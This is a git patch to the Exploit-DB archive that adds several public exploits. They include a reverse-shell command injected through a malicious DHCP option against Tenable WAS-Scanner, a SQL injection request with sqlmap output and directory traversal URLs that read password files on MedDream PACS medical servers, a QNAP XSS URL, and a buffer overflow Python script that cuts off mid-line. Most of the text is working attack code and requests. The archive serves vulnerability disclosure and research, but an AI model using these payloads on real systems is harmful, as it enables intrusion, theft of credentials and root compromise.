From 76af808136a9177e9932fcaaf54fc71522f763a9 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Sat, 8 Sep 2018 05:01:54 +0000
Subject: [PATCH] DB: 2018-09-08

6 changes to exploits/shellcodes

DVD Photo Slideshow Professional 8.07 - Buffer Overflow (SEH)
iSmartViewPro 1.5 - 'SavePath for ScreenShots' Local Buffer Overflow (SEH)
Tenable WAS-Scanner 7.4.1708 - Remote Command Execution
D-Link Dir-600M N150 - Cross-Site Scripting
MedDream PACS Server Premium 6.7.1.1 - 'email' SQL Injection
Softneta MedDream PACS Server Premium 6.7.1.1 - Directory Traversal
QNAP Photo Station 5.7.0 - Cross-Site Scripting
---
 exploits/hardware/webapps/45348.txt | 13 ++++++++
 exploits/linux/remote/45345.txt | 28 ++++++++++++++++
 exploits/php/webapps/45344.txt | 44 ++++++++++++++++++++++++
 exploits/php/webapps/45347.txt | 17 ++++++++++
 exploits/windows/local/45346.py | 47 ++++++++++++++++++++++++++
 exploits/windows_x86/local/45349.py | 52 +++++++++++++++++++++++++++++
 files_exploits.csv | 8 ++++-
 7 files changed, 208 insertions(+), 1 deletion(-)
 create mode 100644 exploits/hardware/webapps/45348.txt
 create mode 100644 exploits/linux/remote/45345.txt
 create mode 100644 exploits/php/webapps/45344.txt
 create mode 100644 exploits/php/webapps/45347.txt
 create mode 100755 exploits/windows/local/45346.py
 create mode 100755 exploits/windows_x86/local/45349.py

diff --git a/exploits/hardware/webapps/45348.txt b/exploits/hardware/webapps/45348.txt
new file mode 100644
index 000000000..805b8a1e0
--- /dev/null
+++ b/exploits/hardware/webapps/45348.txt
@@ -0,0 +1,13 @@
+# Exploit Title: QNAP Photo Station 5.7.0 - Cross-Site Scripting
+# Google Dork: N/A
+# Date: 2018-09-07
+# Exploit Author: Mitsuaki (Mitch) Shiraishi - secureworks
+# Vendor Homepage: https://www.qnap.com/ja-jp/security-advisory/nas-201808-23
+# Software Link: N/A
+# Version: QNAP Photo Station versions 5.7.0 and earlier
+# Tested on: N/A
+# CVE : CVE-2018-0715
+
+# PoC:
+
+https://***.***.***.***:8080/photo/abc/.txt
\ No newline at end of file
diff --git a/exploits/linux/remote/45345.txt b/exploits/linux/remote/45345.txt
new file mode 100644
index 000000000..ea1b4d3d4
--- /dev/null
+++ b/exploits/linux/remote/45345.txt
@@ -0,0 +1,28 @@
+# Exploit Title: Tenable WAS-Scanner 7.4.1708 - Remote Command Execution
+# Discovery by: Sameer Goyal
+# Discovery Date: 2018-05-30
+# Vendor Homepage: https://www.tenable.com/
+# Software Link: https://www.tenable.com/products/tenable-io/web-application-scanning
+# Tested Version: WAS-20180328
+# Vulnerability Type: Remote Command Execution (RCE)
+# Tested on OS: CentOS 7.4.1708
+# Vulnerable daemon version: NetworkManager 1.8.0-11.el7_4
+
+# Steps to produce the RCE:
+
+# Step 1: Setup your malicious DHCP server in the network using dnsmasq:
+
+dnsmasq --interface=eth1 --bind-interfaces --except-interface=lo --dhcp-range=192.168.51.21,192.168.51.25,1h --conf-file=/dev/null --dhcp-option=6,192.168.51.1 --dhcp-option=3,192.168.51.1 --dhcp-option="252,x'&/home/wizard/nc -nv 192.168.51.1 5555 -e /bin/bash #"
+
+# DHCP-option-3 => gateway IP/ DHCP server IP.
+# DHCP-option-6 => DNS IP, which can be same as gateway IP( not mandatory)
+# DHCP-range => simply subnet range (1h, for 1 hour only)
+# DHCP option=> ì252,xí& #î
+
+# Start the listener on port 5555 on other terminal .
+# Step 2: Send the normal IP request to the malicious DHCP server from the victim machine.
+
+nmcli con up ìWired Connection 1î && ifconfig
+
+# Step 3: Check the listener, we have got the reverse shell with root privileges.
+# Reference: https://www.exploit-db.com/docs/english/45334-obtaining-command-execution-through-the-networkmanager-daemon.pdf
\ No newline at end of file
diff --git a/exploits/php/webapps/45344.txt b/exploits/php/webapps/45344.txt
new file mode 100644
index 000000000..1cb307990
--- /dev/null
+++ b/exploits/php/webapps/45344.txt
@@ -0,0 +1,44 @@
+# Exploit Title: MedDream PACS Server Premium 6.7.1.1 - 'email' SQL Injection
+# Date: 2018-05-23
+# Software https://www.softneta.com/products/meddream-pacs-server/downloads.html
+# Version: MedDreamPACS Premium 6.7.1.1
+# Exploit Author: Carlos Avila
+# Google Dork: inurl:Pacs/login.php, inurl:pacsone filetype:php home, inurl:pacsone filetype:php login
+# Category: webapps
+# Tested on: Windows
+# http://twitter.com/badboy_nt
+
+# Proof of Concept
+
+POST /Pacs/userSignup.php HTTP/1.1
+Host: 192.168.6.107
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:60.0) Gecko/20100101 Firefox/60.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://192.168.6.107/Pacs/userSignup.php?hostname=localhost&database=dicom
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 129
+Cookie: PHPSESSID=4l1c7irpgk1apcqk7ll9d89104
+Connection: close
+Upgrade-Insecure-Requests: 1
+DNT: 1
+
+hostname=localhost&database=dicom&username=hi&password=hi&firstname=jh&lastname=k23klk3l2&email=test@gmail.com&action=Sign+Up
+
+# Parameters affected: email, username
+
+root@deb-17-3:~/meddream# sqlmap -r sqli-signup -f -p email --dbms mysql --dbs
+
+[10:23:16] [INFO] testing MySQL
+[10:23:16] [INFO] confirming MySQL
+[10:23:16] [INFO] the back-end DBMS is MySQL
+web application technology: Apache, PHP 7.0.30
+back-end DBMS: MySQL >= 5.0.0
+[10:23:16] [INFO] fetching database names
+[10:23:16] [INFO] used SQL query returns 2 entries
+[10:23:16] [INFO] resumed: information_schema
+[10:23:16] [INFO] resumed: dicom
+available databases [2]:
+[*] dicom
+[*] information_schema
\ No newline at end of file
diff --git a/exploits/php/webapps/45347.txt b/exploits/php/webapps/45347.txt
new file mode 100644
index 000000000..37e4f1fd9
--- /dev/null
+++ b/exploits/php/webapps/45347.txt
@@ -0,0 +1,17 @@
+# Exploit Title: Softneta MedDream PACS Server Premium 6.7.1.1 - Directory Traversal
+# Date: 2018-05-23
+# Software Link: https://www.softneta.com/products/meddream-pacs-server/downloads.html
+# Google Dork: inurl:pacs/login.php, inurl:pacsone/login.php, inurl:pacsone filetype:php home, inurl:pacsone filetype:php login
+# Version: MedDream PACS Server Premium 6.7.1.1
+# Category: webapps
+# Tested on: Windows 7
+# Exploit Author: Carlos Avila
+# Contact: http://twitter.com/badboy_nt
+
+# Proof of Concept
+
+http://TARGET/pacs/nocache.php?path=%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin.ini
+
+http://TARGET/Pacs/nocache.php?path=%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows\System32\drivers\etc\hosts
+
+http://TARGET/Pacs/nocache.php?path=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c\MedDreamPACS-Premium\passwords.txt (Attack Vector, obtain private information from users and passwords -Bypass Authentication- )
\ No newline at end of file
diff --git a/exploits/windows/local/45346.py b/exploits/windows/local/45346.py
new file mode 100755
index 000000000..c4873b78f
--- /dev/null
+++ b/exploits/windows/local/45346.py
@@ -0,0 +1,47 @@ +# Exploit Title: DVD Photo Slideshow Professional 8.07 - Buffer Overflow (SEH) +# Date: 2018-09-06 +# Exploit Author:T3jv1l +# Vendor Homepage:http://www.dvd-photo-slideshow.com/ +# Software:www.dvd-photo-slideshow.com/dps_install.exe +# Category:Local +# Contact:https://twitter.com/T3jv1l +# Version: DVD Photo Slideshow Professional 8.07 +# Tested on: Windows 7 SP1 x86 +# Method Corelan Coder : https://www.corelan.be/index.php/2009/07/28/seh-based-exploit-writing-tutorial-continued-just-another-example-part-3b/ + +#!/bin/python + +print""" +#1. Download and install the setup file +#2. Run this exploit code via python 2.7 +#3. A file "Evil.txt" will be created +#4. Click Help > Register... in tool bar +#5. Copy the contents of the file (Evil.txt)and paste in the Registration Name field +#6. Click Activate and BOOMMMM !!!! """ + +import struct + +junk_byte = "A" * 256 +nseh = "\x90\x90\xeb\x10" +seh = struct.pack("